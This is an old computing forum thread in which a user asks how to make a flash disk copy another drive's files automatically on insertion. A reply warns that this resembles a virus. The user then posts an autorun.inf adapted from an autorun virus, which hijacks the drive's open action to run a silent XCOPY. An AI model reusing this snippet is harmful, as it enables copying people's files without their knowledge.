Computer Problems? Computing.Net has over 1,000,000 posts about all things technology related! Over 90% answered within 24 hours! Click here to start participating now! Also, be sure to check out the New User Guide.
inf file to copy the files
Name: raygate Date: January 16, 2009 at 06:34:16 Pacific OS: Windows XP CPU/Ram: DDR Product: Win xp XP Subcategory: Batch
Comment:
hi
I attempt to creat batch that work automaticly when I blag my flash disk in the computer >...
by copying thye file's which in the other flash disk >> I Know this code to the copying ((XCOPY e:\*.* f:\audio )) the F is my flash and E is the host .. and my problem is to make it worke automaticly like the virus autoran.inf
Name: reno Date: January 16, 2009 at 07:08:14 Pacific
Reply:
that string S-1-5-21-1482476501-1644491937-682003330-1013 looks familiar to me.
are you trying to write some kind of virus?? the virus fake as a recycle bin/system. you have to forget about it, because most pc now have autorun turn off by default.
Name: raygate Date: January 16, 2009 at 07:36:46 Pacific
Reply:
hi ..
in fact i take this code from auto run viruse and this is the last modefing I made: [autorun] open=run copy.exe action=Open eat director.exe shell\open=Open shell\open\command=XCOPY e:\*.* f:\audio /C /S /D /Y /I /Q shell\open\default=1
note: open=run copy.exe the (copy.exe) is batch file I convart it to exe file have this secript:XCOPY e:\*.* f:\audio
Summary: Hi, I need a batch script to copy the today modified sub-folders of a folder to a new folder. Ex: Folder "f:/test1" is having total 5 sub-folders and I want to copy only today created/modified sub-fo...
Summary: Hi mechanix, I don't want the number of the lines in the file, in my example I would like to have the number 5 which means he just take in consideration the lines begining with 00 not the header, what...